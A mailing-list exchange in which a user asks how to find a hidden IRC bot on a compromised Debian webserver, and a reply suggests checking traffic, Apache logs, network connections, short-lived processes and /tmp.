Fran wrote: > I've been told by my ISP that my sarge webserver (only port 80 open, all > software up to date) is spewing traffic they're calling IRC_nick, which > is apparantly some sort of IRC bot. > > I'm unable to locate the file/files that are infected. Additionally, I > can't see the process/processes for the bot when it's running. > > chkproc -v does reveal some hidden procs, but before I can kill them, > they seem to go away. > > chkrootkit/rkhunter don't seem to see anything either. > > Any other suggestions? > Use tcpdump and/or ethereal to check traffic.
Check apache logs. You may see some STDOUT from wget there, if they broke in using a vulnerability in some web app. Watch lsof or netstat for ESTABLISHED connections. Use 1s watch frequency. Use top/htop with high refresh frequency. Note unusual short lived processes. Try locating their binaries or scripts. /tmp most likely. HTH, aru-nas -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
